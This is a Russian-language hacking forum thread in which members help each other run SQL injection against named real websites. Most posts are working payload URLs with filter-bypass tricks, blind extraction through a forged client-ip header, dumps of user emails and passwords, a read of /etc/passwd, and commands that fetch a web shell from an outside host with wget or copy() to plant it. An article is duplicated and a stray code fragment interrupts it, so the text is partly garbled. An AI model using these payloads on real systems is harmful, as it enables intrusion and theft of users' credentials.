Попытался открыть базу tvlab не показало ни одной таблицы так ли это?

kartes1984 said:
http://www.tvlab.com.ua/news/?id=-1+UNION+SELECT+1,2,group_concat(CPU_USER,0x3b,CPU_ SYSTEM),4,5+from+information_schema.profiling+--+
проблема с выводом данных
Попытался открыть базу tvlab не показало ни одной таблицы так ли это?



http://www.tvlab.com.ua/news/?id=-1+UNION+SELECT+1,2,count(*),4,5+from+information_s chema.tables+where+table_schema!=0x696e666f726d617 4696f6e5f736368656d61+--+

1

http://www.tvlab.com.ua/news/?id=-1+UNION+SELECT+1,2,group_concat(0x0b,table_schema, 0x3a,table_name),4,5+from+information_schema.table s+where+table_schema!=0x696e666f726d6174696f6e5f73 6368656d61+--+

tvlab:news

Как здесь обойти фильтрацию. Ветка БД на сайте 5, блиндом крутить лень.

http://www.gidacilar.com/view.php?id=1865'/**/*!union*/**/*!select*/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41+--+&type=print

А в чём именно сложность заключается?


Code:
http://www.gidacilar.com/view.php?id=9999%27UnioN%28SelecT%281%29,2,3,4,5,6 ,user%28%29,8,9,10,11,12,13,14,15,16,17,18,19,20%2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37,38,39,40,%2841%29%29--+&type=print

помогите разобраться, вот скуль


http://eshoker.com.ua/product.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15 ,table_name,17,18,19,20+
from
+information_schema.tables--


на from срабатывает ошибка, пробовал хексить не помогает, символы /!* тоже не помогают, что можно придумать в такой ситуации?

winstrool said:
помогите разобраться, вот скуль
на
from
срабатывает ошибка, пробовал хексить не помогает, символы /!* тоже не помогают, что можно придумать в такой ситуации?


БД зовут eshokcomua, а вот таблицы найти не смог...

o'clock said:
БД зовут eshokcomua, а вот таблицы найти не смог...


так стандартный вывод тоже вывел


http://eshoker.com.ua/product.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15 ,concat_ws(0x3a,version(),database(),user()),17,18 ,19,20--


а вот когда начинаю использовать фром начинает выделываться...

FlaktW said:
Попробуй так:
http://eshoker.com.ua/product.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15 ,16,17,18,19,20+user+--+


http://eshoker.com.ua/product.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15 ,16,17,18,19,20+vse_chto_ugodno+--+

winstrool said:
http://eshoker.com.ua/product.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15 ,16,17,18,19,20+vse_chto_ugodno+--+


Не все, точку например нельзя!

http://eshoker.com.ua/buy.php?id=9+and+1=0+union+select+1,user(),3,4,5,6 ,7,8,9,0,11,12,13,14,15,16,17,18,19,20+information _schema.table+--+&lang=ua

http://eshoker.com.ua/buy.php?id=9+and+1=0+union+select+1,user(),3,4,5,6 ,7,8,9,0,11,12,13,14,15,16,17,18,19,20+information _schematable+--+&lang=ua

FlaktW said:
Не все, точку например нельзя!
http://eshoker.com.ua/buy.php?id=9+and+1=0+union+select+1,user(),3,4,5,6 ,7,8,9,0,11,12,13,14,15,16,17,18,19,20+information _schema.table+--+&lang=ua
http://eshoker.com.ua/buy.php?id=9+and+1=0+union+select+1,user(),3,4,5,6 ,7,8,9,0,11,12,13,14,15,16,17,18,19,20+information _schematable+--+&lang=ua


без FROM там не обоийтись, по крайней мере я таких способов незнаю))

winstrool said:
без
FROM
там не обоийтись, по крайней мере я таких способов незнаю))


http://eshoker.com.ua/buy.php?id=9%0aand%0a1=0%0aunion%0aselect%0a1,2,ta ble_name,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19, 20%0afrom%0ainformation_schema.tables--+&lang=ua

Все выводится...

Tigger said:
http://eshoker.com.ua/buy.php?id=9%0aand%0a1=0%0aunion%0aselect%0a1,2,ta ble_name,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19, 20%0afrom%0ainformation_schema.tables--+&lang=ua
Все выводится...



Извините за наивный вопрос. Где можно почитать про этот способ?

%0a это символ перевода строки "\n"

*:\Services\_InetPub\Domain\

*:\Services\_InetPub\Domain\subDomain\

Может оно

есть хост с провами root, достал пасс от mysql.user, но немогу найти ни phpmyadmin не сpanel, возможно ли гденить на самом хосте просмотреть как выйти на админку ихней бд, пытался также залить шелл через скуль, но кавычки экранируются...

winstrool said:
есть хост с провами root, достал пасс от mysql.user, но немогу найти ни phpmyadmin не сpanel, возможно ли гденить на самом хосте просмотреть как выйти на админку ихней бд, пытался также залить шелл через скуль, но кавычки экранируются...


Попытайся залить шелл через двойной запрос.

/showpost.php?p=663815&amp%3Bpostcount=39

Moriarty said:
А что нибудь похожее на wso есть на asp?


Кое-что есть, стучи в аську

FlaktW said:
Попытайся залить шелл через двойной запрос.
/showpost.php?p=663815&amp%3Bpostcount=39


спасибо, интиресная пища для размшления

все вайл заливается, но вот только теги режутся, проходит только текст((

Возможен ли обход авторизации? (RG=On)

[CODE]
Code:

Ну этож получается, сплоит должен быть такой:


HTML:


Вся соль в том, что переменные $login и $password заранее не объявлены, и при условии что RG=ON, то мы их можем определить используя _GET|POST|COOKIE|SESSION методы. А если мы отправим в $_POST['admin_login'] и $_POST['admin_passwd'] значения идентичные переменным $login и $password (которые мы подменили), то проверка


Code:
if($admin_login == $login && $admin_passwd == $password)

вернет положительный результат, и нас пустит в админку.

Вся соль в том, что переменные $login и $password заранее не объявлены...


Как такое возможно, если учитывать, что на момент сравнения:


$admin_login == $login && $admin_passwd == $password


Переменным $login и $password уже должны быть назначены значения? А при присвоении переменной значения - она считается объявленой?

Если брать в расчет тот код, что ты предоставил, то там переменным не присвоены значения, и уязвимость имеет место быть.

А в случае если код имеет примерно такой вид:

[PHP]
PHP:
[COLOR="#0000BB"][COLOR="#007700"]

2Expl0ited

Да, все верно. Я не правильно написал изначально =[. Сорри.

есть возможность выполнить пхп код, но в коде не должно быть ' ` " , есть ли возможность залить шелл?


Konqi said:
copy($_GET[a],$
_
GET
);&a=http://site.com/shell.php&b=shell.php




спасибо

wkar said:
есть возможность выполнить пхп код, но в коде не должно быть ' ` " , есть ли возможность залить шелл?



copy($_GET[a],$GET);&a=http://site.com/shell.php&b=shell.php

system($_GET[a]);&a=wget http://site.com/shell.php

ну и так далее

Не выводится через ошибку

http://lenta.bkr.ru/out.php?id=40726+or+1+group+by+concat(version(),fl oor%20(rand(0)*2))having+min(0)+or+1+--+

А где ты там mysql ошибку увидел? Там только ошибка php

Expl0ited said:
А где ты там mysql ошибку увидел? Там только ошибка php



Если еще так попробовать обойти фильтрацию

http://lenta.bkr.ru/out.php?id=-40726+union+select+1,2,3,4,5,6,7,8,89,10,11,12,13+--+

Почитай уже основы скуль инъекций!


Code:
http://lenta.bkr.ru/out.php?id=(40726)and(1=0)%75nion(%73elect(1),2,(% 73elect(@x)from(%73elect(@x:=0x00),(%73elect(0)fro m(information_schema.columns)where(table_schema!=0 x696e666f726d6174696f6e5f736368656d61)and(0x00)in( @x:=concat(@x,0x3c62723e,table_schema,0x2e,table_n ame,0x3a,column_name))))x),4,5,6,7,8,9,10,11,12,(1 3))--+

Постоянно задаешь однотипные вопросы!

Кто в курсе, возможно ли такое:

Есть скл, там примерно 20к юзеров, хотелось бы их всех достать с помощью benchmark`a, но если выводить все сразу серв возвращает ошибку, по 100 кое-как, дампить лимитом не вариант.

Допстим запрос:

1,concat(@i:=0x00,@o:=0x0d0a,benchmark(100,@o :=CONCAT(@o,0x0d0a,(SELECT concat(@i:=Email,0x3a,Password) from user WHERE Email>@i order by Email LIMIT 1))),@o),3,4 вернет 100, как слить следующие 100, запарился ждать ответ от элиты рус-хека, которые пытаются его продвигать!

Хочу рассказать вам о новой (может я что-то пропустил?) технике вывода данных при MySQL injection.
Дело в том, что очень неудобно когда при наличии уязвимости в результате мы можем получить всего одну строку за запрос.
Например чтоб получить структуру БД в 5 ветке MySQL, нам придется совершить столько запросов, сколько таблиц в этой самой БД. Ну а о получении имен колонок этих таблиц я уже помалкиваю.
Выходом может быть использование конструкции group_concat, но она имеет ограничение по возвращаемой длине заданное в group_concat_max_len (по умолчанию - 1024) и при огромном количестве таблиц, строка просто обрежется по этой длине.
Обойти это ограничение можно с помощью добавления условий, например table_name>{имя последней полученной таблицы}

select group_concat(table_name) from information_schema.tables



table
table_1
....
table_200



select group_concat(table_name) from information_schema.tables where table_name>'table_200'



table_201
...
table_400



select group_concat(table_name) from information_schema.tables where table_name>'table_400'


...
Еще можно использовать benchmark, типо того:

select concat(@a:=0, @b:=1, benchmark(100, if( (select count(password) from users where id=@a), @b:=concat( (select password from users where id=@a), 0x3a, @b, @a:=@a+1), @a:=@a+1) ) ), cast(@b as char) from users


Но при таком запросе, необходимо чтоб был уникальный числовой ключ.
Или можно ограничивать данные по логическим критериям, чтоб отбирать не все сразу. Но опять же - все делается не одним запросом.
Не буду Вас больше томить тем что Вы и так знаете и покажу о чем я говорю.
Я предлагаю без group_concat и benchmark вывести имена всех таблицы одним запросом.
Запрос строится на пользовательских переменных и условии
NOT IN
( но ручками мы туда вписывать ничего не будем ). Что-то типо цикла - только без явного цикла =)
Скажем для получения всех таблиц БД, запрос будет выглядеть таким образом:

select @pro from ( select @pro:=0x2727, (select null from information_schema.tables where table_name not in(

@pro:=concat(@pro,0x2c27,table_name,0x27) ) limit 0,1 ) )fexer


'','CHARACTER_SETS','COLLATIONS',...


" if author else f"

select @pro from ( select @pro:=0x2727, (select null from information_schema.tables where table_name not in(

@pro:=concat(@pro,0x2c27,table_name,0x27) ) limit 0,1 ) )fexer


'','CHARACTER_SETS','COLLATIONS',...


@pro
- наша пользовательская переменная
fexer
- требуемый алиас для таблицы
У нас получилась некая рекурсия или цикл (не уверен как именно оно обрабатывается), который склеил все строки в одну переменную, которую мы потом и получили.
При склейке данных ( concat ) запрос примет следующий вид:

select @pro from ( select @pro:=0x2727, (select null from information_schema.tables where concat(table_schema,0x2e,table_name) not in( @pro:=concat(@pro,0x2c27,table_schema,0x2e,table_n ame,0x27) ) limit 0,1 ) )fexer



'','information_schema.CHARACTER_SETS','informatio n_schema.COLLATIONS'...


Таким образом, мы можем получить все данные без предварительного запроса их общего количества, уникального численного ключа и ограничения в 1024 символа.


" if author else f"

Хочу рассказать вам о новой (может я что-то пропустил?) технике вывода данных при MySQL injection.
Дело в том, что очень неудобно когда при наличии уязвимости в результате мы можем получить всего одну строку за запрос.
Например чтоб получить структуру БД в 5 ветке MySQL, нам придется совершить столько запросов, сколько таблиц в этой самой БД. Ну а о получении имен колонок этих таблиц я уже помалкиваю.
Выходом может быть использование конструкции group_concat, но она имеет ограничение по возвращаемой длине заданное в group_concat_max_len (по умолчанию - 1024) и при огромном количестве таблиц, строка просто обрежется по этой длине.
Обойти это ограничение можно с помощью добавления условий, например table_name>{имя последней полученной таблицы}

select group_concat(table_name) from information_schema.tables



table
table_1
....
table_200



select group_concat(table_name) from information_schema.tables where table_name>'table_200'



table_201
...
table_400



select group_concat(table_name) from information_schema.tables where table_name>'table_400'


...
Еще можно использовать benchmark, типо того:

select concat(@a:=0, @b:=1, benchmark(100, if( (select count(password) from users where id=@a), @b:=concat( (select password from users where id=@a), 0x3a, @b, @a:=@a+1), @a:=@a+1) ) ), cast(@b as char) from users


Но при таком запросе, необходимо чтоб был уникальный числовой ключ.
Или можно ограничивать данные по логическим критериям, чтоб отбирать не все сразу. Но опять же - все делается не одним запросом.
Не буду Вас больше томить тем что Вы и так знаете и покажу о чем я говорю.
Я предлагаю без group_concat и benchmark вывести имена всех таблицы одним запросом.
Запрос строится на пользовательских переменных и условии
NOT IN
( но ручками мы туда вписывать ничего не будем ). Что-то типо цикла - только без явного цикла =)
Скажем для получения всех таблиц БД, запрос будет выглядеть таким образом:

select @pro from ( select @pro:=0x2727, (select null from information_schema.tables where table_name not in(

@pro:=concat(@pro,0x2c27,table_name,0x27) ) limit 0,1 ) )fexer


'','CHARACTER_SETS','COLLATIONS',...


" if author else f"

select @pro from ( select @pro:=0x2727, (select null from information_schema.tables where table_name not in(

@pro:=concat(@pro,0x2c27,table_name,0x27) ) limit 0,1 ) )fexer


'','CHARACTER_SETS','COLLATIONS',...


@pro
- наша пользовательская переменная
fexer
- требуемый алиас для таблицы
У нас получилась некая рекурсия или цикл (не уверен как именно оно обрабатывается), который склеил все строки в одну переменную, которую мы потом и получили.
При склейке данных ( concat ) запрос примет следующий вид:

select @pro from ( select @pro:=0x2727, (select null from information_schema.tables where concat(table_schema,0x2e,table_name) not in( @pro:=concat(@pro,0x2c27,table_schema,0x2e,table_n ame,0x27) ) limit 0,1 ) )fexer



'','information_schema.CHARACTER_SETS','informatio n_schema.COLLATIONS'...


Таким образом, мы можем получить все данные без предварительного запроса их общего количества, уникального численного ключа и ограничения в 1024 символа.


(c) profexer 2011

Спасибо статью уже видел, но не до конца понял, не получился такой запрос, там точно null нужен? Не силен в скл

select @pro from ( select @pro:=0x2727, (select null user where concat(Email,0x2e,Password) not in( @pro:=concat(@pro,0x2c27,Email,0x2e,Password,0x27) ) limit 0,1 ) )fexer

Кидай ссылку, посмотрим.

Code:
http :// www.meraevents.com/Service_provider_detail.php?spid=1409-999.9+union+select+1,concat(0x696e6a64617461626567 696e,concat(@i:=0x00,@o:=0x0d0a,benchmark(10,@o%20 :=CONCAT(@o,0x0d0a,(SELECT%20concat(@i:=Email,0x3a ,Password)%20from%20user%20WHERE%20Email%3E@i%20or der%20by%20Email%20LIMIT%201))),@o),0x696e6a646174 61656e64),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21--

такой прошел, только больше не вывести.


Code:
http :// www.meraevents.com/Service_provider_detail.php?spid=1409-999.9+union+select+1,concat_ws(0x3a,Email,Password ),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1+from+user--

Так совсем ничего не видно

сдампить дампером также нельзя.

Code:
http://www.meraevents.com/Service_provider_detail.php?spid=(1409)and(1=0)uni on(select(1),2,(select(@x)from(select(@x:=0x00),(s elect(0)from(user)where(0x00)in(@x:=concat(@x,0x3c 62723e,Email,0x3a,Password))))x),4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21)--+

http://www.horolive.com/member-profile.php

как такое раскрутить?)

GroM88 said:
http://www.horolive.com/member-profile.php
как такое раскрутить?)


Только на карусели такое раскручивается =\

А где ты тут уязвимость увидели? Ты дал просто путь к скрипту и что дальше?

А где ты тут уязвимость увидели? Ты дал просто путь к скрипту и что дальше?


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND b.name not like '%test%' ORDER BY a.subscription_date ASC' at line 1

GroM88 said:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND b.name not like '%test%' ORDER BY a.subscription_date ASC' at line 1


Эм...

Ошибка в самом запросе локально, в ней никаких передаваемых параметров удаленно. Как ты представляешь, такое можно проэкспуатировать?

Ну просто логически подумав можно же понять, что никак.

Поимев сорцы можно посмотреть что и как там происходит и возможно получить полноценный SQLi, но так это скорее всего просто локальная ошибка независимая от внешних параметров.

Вот если бы ошибка SQL вылезала при манипуляции с хидерами (Referer, User-Agent) или же GET \ POST \ COOKIE параметрами то да, это была бы скорее всего SQLi, а так... =\

GroM88 said:
http://www.horolive.com/member-profile.php
как такое раскрутить?)




Code:
http://www.horolive.com/psychic-profile.php?id=-3254+union+select+1,concat_ws(0x3a,name,password), 3,4,5,6,7,8+from+user--+

есть хост справами роот, через пхп админ могу заливать файлы, но почемуто при заходе на сам файл, он не отоброжается в браузере, а через load_file('') говорит что он есть

сервак стоит на винде...

база и сам сайт на разных хостах, посмотри @@version_compile_os

Konqi said:
база и сам сайт на разных хостах, посмотри @@version_compile_os


@@version_compile_os=Win32

@@version=5.0.18-nt

есть точный путь до корневого католога сайта, .htaccess не мешает, пхп выполняется, а мой не хочет, даже элементарный phpinfo();

winstrool said:
@@version_compile_os=Win32
@@version=5.0.18-nt
есть точный путь до корневого католога сайта, .htaccess не мешает, пхп выполняется, а мой не хочет, даже элементарный phpinfo();


знач мускул на винде, там какой сервак, апач/iis или что?

если апач то попробуй узнать ос по баннерам

вобщем если ты рут и есть PMA, то ищи там в базах всякие cms ки или форумы, меняй пасс админа, или добавь нового, и залей шелл

быстрый и эффективный метод

http://opi8.com/vision/?id=-33+UNION+SELECT+1,group_concat(0x0b,table_name),3, 4,5,6,7,8,9,10+from+information_schema.tables+wher e+table_schema=0x616d656c69615f74657374 +--+

НЕ получается вывести таблицы имя базы amelia_test

kartes1984 said:
http://opi8.com/vision/?id=-33+UNION+SELECT+1,group_concat(0x0b,table_name),3, 4,5,6,7,8,9,10+from+information_schema.tables+wher e+table_schema=0x616d656c69615f74657374 +--+
НЕ получается вывести таблицы имя базы amelia_test


В ней нет нечего

http://opi8.com/vision/?id=-33+UNION+SELECT+1,2,3,4,5,count(*),7,8,9,10+from+i nformation_schema.tables+where+table_schema=0x616d 656c69615f74657374+--+

0

http://opi8.com/vision/?id=-33+UNION+SELECT+1,2,3,4,5,6,7,8,9,10+-+

opi8-база

omokage@localhos-пользователь

Как проверить есть ли у пользователя файловые привелегии?

вернул ноль:


Code:
http://opi8.com/vision/?id=-33+UNION+SELECT+1,2,3,4,5,load_file(0x2f6574632f70 6173737764),7,8,9,10--+

на нужном сайте нашёл фтп доступ

шарясь по папкам и файлам конфига не нащёл.

шелл через браузер не залить

вот такой вопрос

а можно подключиться к этому же фтп через тотал команд или любой другой фтп софт

фтп вероятна без пароля? коль позволяет заходить через браузер и осматриваться

не в том направлении мыслю?

Koren

зайти можно юзая любой фтп клиент, например filezilla

но это аккаунт анонимус, врятли будут права для заливки файлов

если серв на *Nix-e, то смотри в сторону рут сплоитов под данную фтпшку

Code:
Warning: Cannot modify header information - headers already sent by (output started at /home/infosno/public_html/index.php:2157) in /home/infosno/public_html/index.php on line 394
« Error »
Etomite encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »

PHP error debug
Error: Cannot modify header information - headers already sent by (output started at /home/infosno/public_html/index.php:2157)
Error type/ Nr.: Warning - 2
File: /home/infosno/public_html/index.php
Line: 394
Line 394 source: header('Content-Type: '.$type.'; charset='.$this->config['etomite_charset']);

Parser timing
MySQL: 0.0000 s s (0 Requests)
PHP: 0.6546 s s
Total: 0.6546 s s

Можно использовать эту ошибку как уязвимость? если да то можно пример...

foozzi said:

Code:
Warning: Cannot modify header information - headers already sent by (output started at /home/infosno/public_html/index.php:2157) in /home/infosno/public_html/index.php on line 394
« Error »
Etomite encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »

PHP error debug
Error: Cannot modify header information - headers already sent by (output started at /home/infosno/public_html/index.php:2157)
Error type/ Nr.: Warning - 2
File: /home/infosno/public_html/index.php
Line: 394
Line 394 source: header('Content-Type: '.$type.'; charset='.$this->config['etomite_charset']);

Parser timing
MySQL: 0.0000 s s (0 Requests)
PHP: 0.6546 s s
Total: 0.6546 s s

Можно использовать эту ошибку как уязвимость? если да то можно пример...


Сайт вам сообщает, что не может вывести заголовки, поскольку они уже были выведены. Конечно там может что то есть, но из этой ошибки можно получить только раскрытие путей. Если переменные, преступаемые в header не фильтруются, то вполне возможно получить XSS.

Анализировал сайт через Webcruiser тот обнаружил пару уязвимостей,провел sql атаку и тут выдало всю Бд и Информацию о сервере,слил все аккаунты и хеши с паролями. Мне нужно повысить права доступа на своем аккаунте на том сайте,можно ли как нибуть редактировать БД? Mysql-5

Выглядит уязвимость так


Code:
_http://wow-hummer.com/account/index.php?modul=static&id=5

Кейворд: Игрового

эм... зайти под админом и повысить свои права;залить шелл, найти конфиг и отредактировать бд; если открыта бд mysql сбрутить пасс, найти пхпмайадмин и опять же повысить свои права

З.Ы. какой вопрос такой ответ

Ну в принципе я об этом тоже думал,логин и пасс от мускла у меня есть,только не расшифровывается)

Думал есть какие нить варианты как в таблице бд поменять значение.

Помогите уважаемые гуру.

и так вот сайтик:

http://rswow.ru/page.php?p[]=rules

Вылазит такая штука


Warning: mysql_real_escape_string() expects parameter 1 to be string, array given in Y:\home\195.88.62.202\www\page.php on line 14


Подскажите как то заюзать данную штуку.

Заранее спасибо.

mysql_real_escape_string() принимает параметр типа стринг, о чем и говорит имя фунцкии, а ты передаешь массив, вот и ругается..

0x002 said:
Помогите уважаемые гуру.
и так вот сайтик:
http://rswow.ru/page.php?p[]=rules
Вылазит такая штука
Подскажите как то заюзать данную штуку.
Заранее спасибо.


Например, так:

http://wow.war-top.ru/index.php?do=sitedetails&id=74'+and+(select+1+from+(select+count(0),concat( (select+version()),floor(rand(0)*2))+from+(select+ 1+union+select+2+union+select+3)x+group+by+2+limit +1)a)+--+

Konqi said:
mysql_real_escape_string() принимает параметр типа стринг, о чем и говорит имя фунцкии, а ты передаешь массив, вот и ругается..


Я понял что тип стринг


mysql_real_escape_string() - используется для защиты от sql атак

0x002 said:
Я понял что тип стринг
Цитата:
mysql_real_escape_string() - используется для защиты от sql атак


и что?

ты же не будешь проверить на SQL injection через подставку массива вместо стринга

тебе выше показали запрос

Раскрытие пути, не более того

Прошу помощи

вот http://wow.bridge.net.ua/index.php?n=server&sub=arena&realm=-1


Check field dbinfo in table `realmlist` for realm id=

0x002 said:
Прошу помощи
вот http://wow.bridge.net.ua/index.php?n=server&sub=arena&realm=-1


Где ты там увидел уязвимость?

0x002 читай маны по скуль инъекциям =\

а то всю жизнь тебе кто то будет раскручивать недоскули =\

SELECT id, date FROM post ORDER BY date desc LIMIT 1,
$inj


Что-нибудь было придумано для решения SQL-инжекций в таких запросах?

UNION SELECT использовать соответсвенно не дает (Incorrect usage of UNION and ORDER BY).

/showthread.php?t=56446

/showpost.php?p=535989&postcount=4

>24.12.2007, 20:40

Вот я и спрашиваю, а изменилось ли что-нибудь?

вот ссылка


http://ttic.ru/counter/


в header вписывая client-ip: 1' выходит скуля

Но при раскручивании ничего не выявляет и не показывает!

Помогите плз!

Faaax said:
в header вписывая client-ip: 1' выходит скуля


У меня ничего не выходит. Напиши HTTP-запрос и ответ, в котором ты нашел уязвимость.

Раскрытие пути - http://ttic.ru/modules/counter/mod.php

Code:
Host: ttic.ru
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
DNT: 1
Cookie: PHPSESSID=b6304a7231ca8359ec09f27330a48932
Connection: keep-alive
Cache-Control: max-age=0
client-ip: 1'

через дополнение mozilla live http replay

Очень интересная инъекция. Один из вариантов решения:

client-ip: -1' union select 1,2,3 from information_schema.tables where '1'='1 - true ("You have been banned")

client-ip: -1' union select 1,2,3 from information_schema.tables where '1'='2 - false (страница без изменений)

вот и я о том же,этот запрос я тоже пробовал,что меня и огорчило!

Faaax said:
вот и я о том же,этот запрос я тоже пробовал,что меня и огорчило!


Тут нечему огорчаться. Пиши скрипт и выводи все, что хочешь =)

client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>128 and '1'='1 нет

client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>64 and '1'='1 да

client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>96 and '1'='1 нет

client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>80 and '1'='1 да

client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>88 and '1'='1 нет

client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>84 and '1'='1 да

client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>86 and '1'='1 нет

client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>85 and '1'='1 нет

Код первого символа - 85

M_cript

спасибо за помощь

есть ещё вопросик

есть скуля,но в ней фильтруется и and и union


Code:
http://www.shoptop.ru/sitemap.html?lim1=8250%27%20&&%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52,53,54,55,56%20#

как обойти фильтрацию union select?

Faaax said:
M_cript
спасибо за помощь
есть ещё вопросик
есть скуля,но в ней фильтруется и and и union

Code:
http://www.shoptop.ru/sitemap.html?lim1=8250%27%20&&%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52,53,54,55,56%20#

как обойти фильтрацию union select?


Попробуй поменять регистр.

Ну или /*!union*/

Здравствуйте!

Произвел sql inj.

Есть таблица users в ней вся регистрационная информация о пользователях+(столб с названием pass). У всех пользователей в ячейках pass пусто.

Что делать?

Доступ к information schema закрыт.(Load_FILE тоже не работает).

версия мускула 4.1.22-standard

G.A.D said:
Здравствуйте!
Произвел sql inj.
Есть таблица users в ней вся регистрационная информация о пользователях+(столб с названием pass). У всех пользователей в ячейках pass пусто.
Что делать?
Доступ к information schema закрыт.(Load_FILE тоже не работает).
версия мускула 4.1.22-standard


У 4 ветки information_schema нет

Ясно.

Как быть?

f1ng3r said:
Попробуй поменять регистр.
Ну или /*!union*/


менял,бестолку

G.A.D said:
Ясно.
Как быть?


Крути как blind

/thread19844.html

Faaax said:
менял,бестолку


Выложи сайт, посмотрим.

Спасибо! Пробовал,не получается.

Все поля кроме pass отображаются.

Всё Всем Спасибо!

Вопрос снят в таблице два столбца с паролями!=)

FlaktW +1 от меня=)

XAMEHA said:
Tigger
, сайт был выложен.
Faaax
, всё там выводиться:

Code:
http://www.shoptop.ru/sitemap.html?lim1=8252,%208254%20union%20select%20 version%28%29,2,3+--+

Инъекция в LIMIT.


Разъяснить, как вы подобрали количество полей

+orde+by+3 +--+

+group+by+3+--+

не проходят, или это простая подстановка +union+select+1,2,3+--+ в запрос

XAMEHA said:
Tigger
, сайт был выложен.
Faaax
, всё там выводиться:

Code:
http://www.shoptop.ru/sitemap.html?lim1=8252,%208254%20union%20select%20 version%28%29,2,3+--+

Инъекция в LIMIT.


Товарисч сенсей, в MySQL запросах комментарий не обрамляется с обеих сторон пробелами.


FlaktW said:
Разъяснить, как вы подобрали количество полей
+orde+by+3 +--+
+group+by+3+--+
не проходят, или это простая подстановка +union+select+1,2,3+--+ в запрос


В SQLi-иньекциях, которые находятся в LIMIT'e, конструкция ORDER BY не допускается к использованию. Таков синтаксис языка.


XAMEHA said:
Знаю, так немного удобнее для меня.


Ааа, ну ок. Вопросов больше не имею.

Tigger said:
В SQLi-иньекциях, которые находятся в LIMIT'e, конструкция ORDER BY не допускается к использованию. Таков синтаксис языка.


Как такие скули, находятся. Запросы типа

http://www.shoptop.ru/sitemap.html?lim1=8252-1

http://www.shoptop.ru/sitemap.html?lim1=8252 and 1=0

http://www.shoptop.ru/sitemap.html?lim1=8252 and true=false

http://www.shoptop.ru/sitemap.html?lim1=8252*1

на нее не указывают

Проги Acunetix Web Vulnerability Scanner, WebCruiser ее не находят

FlaktW said:
Разъяснить, как вы подобрали количество полей
+orde+by+3 +--+
+group+by+3+--+
не проходят, или это простая подстановка +union+select+1,2,3+--+ в запрос


Тут сразу видно, что используется limit, поэтому его дописываем, подбираем кол во полей вручную и комментарий.


Tigger said:
Товарисч сенсей, в MySQL запросах комментарий не обрамляется с обеих сторон пробелами.


Знаю, так немного удобнее для меня.

Faaax said:
M_cript
спасибо за помощь
есть ещё вопросик
есть скуля,но в ней фильтруется и and и union

Code:
http://www.shoptop.ru/sitemap.html?lim1=8250%27%20&&%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52,53,54,55,56%20#

как обойти фильтрацию union select?


В этом посте явно видно, что использовалось какая-то программа, которая и указала на SQL-inj

Code:
divantvplus.ru/index.html?id=390%20and%201=2+union+select+1,2,3,4 ,5,6,7,8,9,10,11--+

Не могу разобрать почему отображается так?!

ReV0LVeR said:
Не могу разобрать почему отображается так?!


Потому что значение поля 6 используется скриптом для вывода данных.

http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,0 x35,1,1,1,1,1--+

http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,0 x36,1,1,1,1,1--+

http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,0 x31,1,1,1,1,1--+

http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,0 x30,1,1,1,1,1--+

Имеем 4 различных состояния. При использовании бинарного поиска на один символ максимум 4 запроса.

Cпасибо! Первый раз с подобным встречаюсь. Что дальше? Можно прямо ссылкой на фак.

